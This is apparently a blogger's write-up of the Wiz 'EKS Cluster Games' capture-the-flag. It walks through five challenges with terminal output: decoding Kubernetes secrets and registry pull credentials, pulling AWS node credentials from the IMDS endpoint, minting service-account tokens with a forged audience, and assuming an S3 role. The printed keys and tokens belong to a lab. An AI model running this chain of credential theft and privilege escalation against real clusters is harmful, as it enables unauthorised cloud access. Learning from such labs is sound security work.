EKS Cluster Games Challenge
Table of Contents
Introduction
I recently had a lot of fun doing the EKS Cluster Games by Wiz, I’ve also been meaning to get into writeups when I do these kind of activities, and this felt like a great one to start on.
The EKS cluster games are a series of 5 EKS challenges that start you of in a low-privileged EKS pod with a web shell for access.
Challenge 1
The first challenge had the description Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?
The first thing I tend to do in these circumstances is check whether I have kubectl
and a valid token. Usually I check straight into checking my permissions, but I thought for this one I’d jump the boat slightly straight to secrets:
root@wiz-eks-challenge:~# kubectl get secrets
NAME TYPE DATA AGE
log-rotate Opaque 1 9d
Hmmm… that doesn’t seem like it’d be a flag, but you never know.
root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
kind: Secret
metadata:
creationTimestamp: "2023-11-01T13:02:08Z"
name: log-rotate
namespace: challenge1
resourceVersion: "890951"
uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
type: Opaque
kind: List
metadata:
resourceVersion: ""
The secret name lied! There is a flag inside. Data in secrets are base64 encoded, so a quick decode gets us the first flag.
root@wiz-eks-challenge:~# base64 -d <<< d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
wiz_eks_challenge{omg_over_privileged_secret_access}
Challenge 2
The next challenge takes us into container registries: A thing we learned during our research: always check the container registries
So the first step is likely to be find the URL of the registry. If there are any pods, the image
field in the pod spec should at least be able to point us in the right direction.
root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
[..SNIP..]
- image: eksclustergames/base_ext_image
imagePullPolicy: Always
name: my-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-cq4m2
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
imagePullSecrets:
- name: registry-pull-secrets-780bab1d
nodeName: ip-192-168-21-50.us-west-1.compute.internal
preemptionPolicy: PreemptLowerPriority
[..SNIP..]
Looking at the image
field, it looks like the registry would be docker hub as no other registry URL is specified and that’s usually a good bet as the default. The pod spec also contained an imagePullSecret
, these are used by Kubernetes to pull images that may require authentication.
root@wiz-eks-challenge:~# kubectl get secret registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
.dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2023-11-01T13:31:29Z"
name: registry-pull-secrets-780bab1d
namespace: challenge2
resourceVersion: "897340"
uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjson
root@wiz-eks-challenge:~# base64 -d <<< eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19; echo
{"auths": {"index.docker.io/v1/": {"auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="}}}
We can get to it, excellent, and it confirms out suspicions of the registry being docker hub. We can decode the base64 auth
token to get the username and password and login to docker hub. Wiz were nice and had crane pre-installed. Now when I was doing this originally, I hadn’t really used it before so was doing the challenges with docker
, dive
, etc, but spent some time learning it afterwards and this time I’ll try it with crane.
root@wiz-eks-challenge:~# base64 -d <<< ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw==; echo
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
root@wiz-eks-challenge:~# crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo index.docker.io
#2023/11/11 01:59:43 logged in via /home/user/.docker/config.json
Now we’ve authenticated, let’s see what tags are for the image the pod was using (eksclustergames/base_ext_image
)
root@wiz-eks-challenge:~# crane ls eksclustergames/base_ext_image
latest
Hmm… just the one. Let’s pull it and see if there is anything in the image itself, such as in the layers or the config.
root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sleep",
"3133337"
],
"ArgsEscaped": true,
"OnBuild": null
},
"created": "2023-11-01T13:32:18.920734382Z",
"history": [
[..SNIP..]
{
"created": "2023-11-01T13:32:18.920734382Z",
"created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
Ah excellent, the flag is in the image filesystem, but it was added as a command in the Dockerfile so is also in the history in the config.
Challenge 3
Oh, now we need to go through an images layers: A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.
Let’s just quickly double check we are using the same registry.
root@wiz-eks-challenge:~# kubectl get pods -o yaml | grep -i image
- image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
imagePullPolicy: IfNotPresent
image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
Oh a different registry, and no imagePullSecrets
either. Looking at the registry URL, that looks to be the format of ECR - AWS’s Elastic Container Registry. These typically do require authentication to pull images from, it’s likely the node itself has credentials through its IAM instance role which would explain why there are no imagePullSecrets
.
A quick sts get-caller-identity
suggests no credentials, but directly querying IMDS does retrieve a set of access keys
root@wiz-eks-challenge:~# aws sts get-caller-identity
Unable to locate credentials. You can configure credentials by running "aws configure".
root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/
eks-challenge-cluster-nodegroup-NodeInstanceRoleroot@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
{"AccessKeyId":"ASIA2AVYNEVMYXNB6AZS","Expiration":"2023-11-11 03:08:34+00:00","SecretAccessKey":"gIkSQe5FnYuY8B3dsemZM45H/+Bfr3Wjw4VepURY","SessionToken":"FwoGZXIvYXdzENT//////////wEaDE5LCHhwL0GDSWLq6CK3Ae6Tq7fE873OeuyL6MY+Rjnw39ImNbOmmmEUvyZKJtyIqI2jBQ4CzCqsnuLPkz5B2gNqmlksttlPlPCN4TNKIjz+K/V+xTgKbUBA3OF1VFKWtmXLYlB3NTuhn+629vYUc3PjqSjed7VrWHlcOKqlI32CRlMRa+w8Oeru2NPsLPBTtGs9M/uH3z1khn/52qytdDHbn0pWXQ6RGGG3X1Wu6bIezHrvrtwksFStb4M+boo1zYDJIa0ZAiiixLuqBjItX6bfCJvOiuWergt7TJ5kIII6YDQu8LxDtWiG43fLM/6zRQGa6RgblfHeinxB"}
That’s fine, we can just load them manually into environment variables and carry on.
root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=ASIA2AVYNEVMYXNB6AZS
root@wiz-eks-challenge:~# export AWS_SECRET_ACCESS_KEY=gIkSQe5FnYuY8B3dsemZM45H/+Bfr3Wjw4VepURY
root@wiz-eks-challenge:~# export AWS_SESSION_TOKEN=FwoGZXIvYXdzENT//////////wEaDE5LCHhwL0GDSWLq6CK3Ae6Tq7fE873OeuyL6MY+Rjnw39ImNbOmmmEUvyZKJtyIqI2jBQ4CzCqsnuLPkz5B2gNqmlksttlPlPCN4TNKIjz+K/V+xTgKbUBA3OF1VFKWtmXLYlB3NTuhn+629vYUc3PjqSjed7VrWHlcOKqlI32CRlMRa+w8Oeru2NPsLPBTtGs9M/uH3z1khn/52qytdDHbn0pWXQ6RGGG3X1Wu6bIezHrvrtwksFStb4M+boo1zYDJIa0ZAiiixLuqBjItX6bfCJvOiuWergt7TJ5kIII6YDQu8LxDtWiG43fLM/6zRQGa6RgblfHeinxB
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Perfect. With these credentials, hopefully we can authenticate and pull data from ECR. We can use aws ecr get-login-password
to generate ourselves a password, and then login with the username AWS
.
root@wiz-eks-challenge:~# aws ecr get-login-password | crane auth login -u AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
2023/11/11 02:11:21 logged in via /home/user/.docker/config.json
Now authenticated, let’s go down the same path as before with getting the tags, but let’s pull the filesystem instead of the config.
root@wiz-eks-challenge:~# crane ls 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c
374f28d8-container
root@wiz-eks-challenge:~# crane export 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container image.tar
root@wiz-eks-challenge:~# ls -l image.tar
-rw-r--r-- 1 root root 4493312 Nov 11 02:13 image.tar
root@wiz-eks-challenge:~# tar xvf image.tar
etc
proc
sys
[..SNIP..]
root@wiz-eks-challenge:~# grep -ri wiz_eks_challenge
Guess it won’t be as easy as just looking at the overall filesystem and grepping it. Let’s go through the config again then, and let’s actually see what these layers are. In the past I’ve seen this where they add a flag, and then delete it in a later layer, maybe that’s the case here.
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sleep",
"3133337"
],
"ArgsEscaped": true,
"OnBuild": null
},
"created": "2023-11-01T13:32:07.782534085Z",
"history": [
[..SNIP..]
{
"created": "2023-11-01T13:32:07.782534085Z",
"created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
"comment": "buildkit.dockerfile.v0"
},
[..SNIP..]
Oh, it’s similar to before, just a temporary environment variable instead of written to the filesystem. I guess I did the previous version the slightly unintended way of going through the config and not the filesystem. Moving on.
Challenge 4
Ah, the next one is breaking out to the underlying node.. or at least getting to the node’s kubelet account: You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?
At this point I also notice the View Permissions
button, was that there the entire time?
There are two immediate ways that come to mind when thinking of breaking out onto an EKS node. One is doing an actual container breakout, the second is going through IMDS and the IAM credentials within as that’s how EKS nodes typically authenticate. Now funnily enough, we did literally did that two seconds ago in challenge 3 so we clearly have access to the nodes IAM role. Do we still have those?
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Looks like it. Now we have the role, we just need the cluster name in AWS so we can generate a kubeconfig
file. Checking ~/.kube/config
for the existing name suggests localcfg
which doesn’t sound like it’s right but worth a shot.
root@wiz-eks-challenge:~/.kube# aws eks update-kubeconfig --name localcfg
An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/localcfg
No luck, maybe I don’t have permissions for update-kubeconfig
. Under the hood, the main part this sets up is the kubeconfig
file pointing to the correct API server, and configuring authentication to use aws eks get-token
. We can probably just do that manually. From my notes archive, I quickly pull up the format the kubeconfig
is set to and extract the parts relevant to the AWS authentication:
users:
- name: name
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
command: aws
args:
- --region
- $region_code
- eks
- get-token
- --cluster-name
- $cluster_name
We can quickly tweak this a tad and put that into the existing config at ~/.kube/config
(after backing it up of course).
root@wiz-eks-challenge:~/.kube# cat config | tail
exec:
apiVersion: client.authentication.k8s.io/v1beta1
command: aws
args:
- --region
- us-west-1
- eks
- get-token
- --cluster-name
- localcfg
root@wiz-eks-challenge:~/.kube# kubectl get -A secret
error: You must be logged in to the server (Unauthorized)
As predicted, it didn’t work. Seems we need another way to the name. The next place to logically check would be the user data scripts in IMDS:
root@wiz-eks-challenge:~# curl 169.254.169.254/latest/user-data
{}
Damn, it’s empty. After a bit of thinking and poking around, I look at the nodes role ARN (arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282
). Could this just be following a naming scheme, and it’s just as simple as eks-challenge-cluster
? Swapping out the cluster name to this and giving it a shot:
root@wiz-eks-challenge:~# kubectl get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "secrets" in API group "" at the cluster scope
Excellent, that looks like the username format for a node with the system:node
prefix. Now just to find the flag. Initial enumeration suggest different permissions to what I find a node typically has, so we can quickly check its actual permissions through auth can-i --list
and got nothing. I then realised I seemed to be querying for challenge3
namespace as that was set in the kubeconfig
file. Switching to challenge4
namespace reveals a few things:
root@wiz-eks-challenge:~/.kube# kubectl auth can-i --list -n challenge4
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[..SNIP..]
It can get secrets, let’s see if there’s a flag in there again.
root@wiz-eks-challenge:~/.kube# kubectl get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
kind: Secret
metadata:
creationTimestamp: "2023-11-01T12:27:57Z"
name: node-flag
namespace: challenge4
resourceVersion: "883574"
uid: 26461a29-ec72-40e1-adc7-99128ce664f7
type: Opaque
kind: List
metadata:
resourceVersion: ""
root@wiz-eks-challenge:~/.kube# base64 -d <<< d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}
Onwards.
Challenge 5
Now we need to move to AWS: You've successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?
Funnily enough, earlier this year I had built a similar challenge for an internal CTF and I had a strong inkling what sort of issue we might be leveraging here. Skimming the trust policy confirmed my suspicion. The relevant aspect being:
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
This enforces that the JWT token generated by the API server has the aud
set to sts.amazonaws.com
, but doesn’t validate any other field such as the sub
which defines the service account the token is for. Checking permissions within Kubernetes, looks like we have create on serviceaccounts/token
, with this it’s possible for us to generate our own tokens for service accounts. It also has a flag to let us customise the aud
field ;) First thing, let’s find a service account we can use.
root@wiz-eks-challenge:~# kubectl get sa
NAME SECRETS AGE
debug-sa 0 10d
default 0 10d
s3access-sa 0 10d
The obvious one to choose there is s3access-sa
right?
root@wiz-eks-challenge:~# kubectl create token s3access-sa
error: failed to create token: serviceaccounts "s3access-sa" is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot create resource "serviceaccounts/token" in API group "" in the namespace "challenge5"
Nevermind, I wonder what we have create token on.
root@wiz-eks-challenge:~# kubectl auth can-i --list | grep token
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
serviceaccounts/token [] [debug-sa] [create]
Ah, we can only create tokens for the debug-sa
service account. Well, that’s not really an issue as AWS should just be checking the aud
field, and not the sub
.
root@wiz-eks-challenge:~# kubectl create token debug-sa
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTY5OTY3NDg2MiwiaWF0IjoxNjk5NjcxMjYyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE2OTk2NzEyNjIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.gMfWrwtXqYwM_DTcJfY04o6As-sIj1vdIPre7g2FdEsjFd-w4MwFQucn74dud8ZplEogbdTeloxt47_ZfujQLZFd66d2YZ7mpYVtCZALtX3xRzIx-MCq63XFtuMiqf_7x_763zPRKvzbwkf9qQs1Pd8S8Ldcpd_76xJJZ80NPNHtv_FQLJSh1Uy0On6x6roiZjQVzNID3kWzZ-b02vtTxrJhLpbrJxaSFqGtPXS5htxs1HTUmpVkhnhRH7h6zlQ2H8lEqGsAyAMFYfsjykdXf6Tq5vkookZiRdIc98YirT9V_XY93hCqkW6U9KPOLtJeaYa7MIhU_uy8zBrs1Yqvsg
OK, we can generate tokens for this service account. The above token will still have the default audience of the Kubernetes service. We can change that though with the --audience
flag.
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience=sts.amazonaws.com
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNjk5Njc0OTI2LCJpYXQiOjE2OTk2NzEzMjYsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTY5OTY3MTMyNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.WK4hZKiG058s9I2uIajISwrwNUmYfblu3V1poOvxuK83wKTbggVDJTNZiTaqLB0wCvgt1hqHNDp9XE8rrwYQgx41g7NlBKqn1VD8G_qhIFUJ-4HQtfrlxDfffd5ZHus970RfyADAB6Ld1d7I0HuficOAu2BLRe3caxGxZcH82zRov4SWsxaB8H5yz9WiCYQCKG_D8X9e8gpryrbP3U6bRloTViTNo_hziYgABNpbqQbHALuQl3FMTGNpZ6-qu9LalV9FxMYXgY_KNxZ6HkwrkNWzFojorr1A4MojxyeG6DwyLd7Wdr7lmPiNPw3EqTzmWGY7G49bTQChKpbuJx8xjg
Now we have the token, we just need the role ARN. The typical way the EKS mutating controllers manage this is an annotation on the service account which the controllers read and inject the relevant environment variables.
root@wiz-eks-challenge:~# kubectl get sa s3access-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
creationTimestamp: "2023-10-31T20:07:34Z"
name: s3access-sa
namespace: challenge5
resourceVersion: "671916"
uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
There it is, now we can authenticate to AWS and assume the role. Luckily, the AWS CLI can do this for us if we give it the token and the ARN we would like to assume.
root@wiz-eks-challenge:~# export AWS_ROLE_ARN=arn:aws:iam::688655246681:role/challengeEksS3Role
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience=sts.amazonaws.com > token
root@wiz-eks-challenge:~# export AWS_WEB_IDENTITY_TOKEN_FILE=$PWD/token
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Odd. Oh I probably still have the environment variables set for assuming the nodes instance profile. I guess the CLI checks for that first before this method. Let’s try disabling that.
root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=""
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMZEZ2AFVYI:botocore-session-1699671587",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/botocore-session-1699671587"
}
Excellent, now we are the required role, let’s get the flag. We can get the bucket name and key from the IAM policy.
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag -
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}